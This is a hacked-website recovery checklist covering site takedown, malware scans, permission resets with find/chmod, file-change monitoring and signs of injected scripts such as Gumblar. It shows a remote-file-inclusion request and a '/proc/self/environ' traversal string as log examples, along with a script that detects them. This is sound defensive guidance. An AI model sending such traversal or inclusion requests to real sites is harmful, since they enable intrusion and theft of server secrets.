Security Checklist: Have you been hacked?


Action List

  • Take your website offline (we recommend the htaccess method).
  • Scan all machines with FTP, super admin, and admin access for malware, virus, trojans, spyware, etc. (see Local Security below)

  • Notify your host and work with them to clean up the site, and to make sure there are no back doors to your site.

  • See if you have any vulnerable extensions and deal with them. Your log files give a clue to which extensions are being targeted. Here is an example of what to look for.

//administrator/components/com_extension/admin.extension.php?mosConfig.absolute.path=http:

Or

../../../../../../../../../../../../../../../../proc/self/environ
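One way to search an access log for requests like the two above (an added example, not part of the original checklist). It assumes the Apache combined log layout and also matches the underscore spelling mosConfig_absolute_path; the function names, the RFI/LFI labels and the sample log lines are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original page): flag access-log requests that
# resemble the two log patterns shown above. Labels and names are this example's own.

# Constructed sample in Apache combined-log layout; IPs are documentation ranges.
sample_log() {
cat <<'EOF'
192.0.2.10 - - [01/Jan/2010:10:00:00 +0000] "GET /index.php HTTP/1.1" 200 5120
198.51.100.7 - - [01/Jan/2010:10:00:05 +0000] "GET //administrator/components/com_extension/admin.extension.php?mosConfig_absolute_path=http://example.invalid/ HTTP/1.1" 404 312
198.51.100.7 - - [01/Jan/2010:10:00:09 +0000] "GET /index.php?page=../../../../proc/self/environ HTTP/1.1" 200 901
203.0.113.4 - - [01/Jan/2010:10:01:00 +0000] "GET /index.php?page=%2e%2e%2f%2e%2e%2fproc%2fself%2fenviron HTTP/1.1" 200 877
EOF
}

# Read log lines on stdin; print "LABEL client status request" per suspicious line.
classify_requests() {
    awk '
    {
        line = tolower($0)
        # Undo the percent-encodings commonly used to hide "." "/" and ":".
        gsub(/%2e/, ".", line); gsub(/%2f/, "/", line); gsub(/%3a/, ":", line)
        # Field 1 = client, 7 = request path, 9 = HTTP status.
        if (line ~ /mosconfig[._]absolute[._]path=(https?|ftp):/)
            print "RFI", $1, $9, $7      # config path pointed at a remote URL
        else if (line ~ /(\.\.\/)+proc\/self\/environ/)
            print "LFI", $1, $9, $7      # directory traversal to /proc/self/environ
    }'
}

# Hits per client, busiest first: "count client".
summarize() {
    classify_requests |
        awk '{ n[$2]++ } END { for (ip in n) print n[ip], ip }' |
        sort -k1,1nr -k2,2
}

# Usage: sh scan.sh /path/to/access_log   (no argument: run on the sample)
if [ -n "${1:-}" ]; then summarize < "$1"; else sample_log | summarize; fi
```

A hit answered with status 200 deserves a closer look than one answered with 404, since the server actually served the requested script.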

chmod and cron

If you have permission to access SSH (secure shell), for example via PuTTY, you can chmod the files and directories. If you do not have shell access, you can run the commands from cron by setting up a temporary cron job: copy and paste the command into a cron job and schedule it to run about 2 minutes after you save it. Whether you run the command from PuTTY or from a cron job, using the full physical path to public_html is recommended for best results.

For files use:

find /home/xxxxxx/domains/xxxxxxx.com/public_html -type f -exec chmod 644 {} \;

For directories use:

find /home/xxxxxx/domains/xxxxxxx.com/public_html -type d -exec chmod 755 {} \;

Monitoring for File Changes

To check for recent file changes on your system, use this command from PuTTY (SSH - secure shell) or via a cron job. If you run the command from a cron job, you can schedule it to check for changed files several times each day. Results will be sent to the domain account owner and show the time/date stamp for any changed files. Whether you run the command from PuTTY or from a cron job, using the full physical path to public_html is recommended for best results.

find /home/xxxxxx/domains/xxxxxxx.com/public_html -type f -ctime -1 -exec ls -ls {} \;

Please note that your site's files may be located in public_html, httpdocs, www, or a similar place, and your physical path may also differ from the one in the examples. Adjust the physical path accordingly.

Malicious Code or Odd Links appearing on your site

Check whether the original template file inserts the unwanted code or malicious JavaScript, and whether you downloaded a paid-for template from an untrusted source, e.g. file-sharing sites.

Gumblar doesn’t use any particular script vulnerability. Its script is injected into every web page on a site (I would imagine, though this is not confirmed, that if an infected page is edited and then saved, the script will also end up in the database). The script changes every time it is accessed. It has been seen on phpBB, SMF and vBulletin forums, on WordPress 2.7.1 blogs, and on proprietary PHP sites. The script starts with (function( , has no name, and is obfuscated. A common Gumblar version breaks sites due to a bug in the script.

iFrames

In recent iframe exploits the malicious code was only injected into files with the most common filenames (e.g. index.html, index.php, etc.).
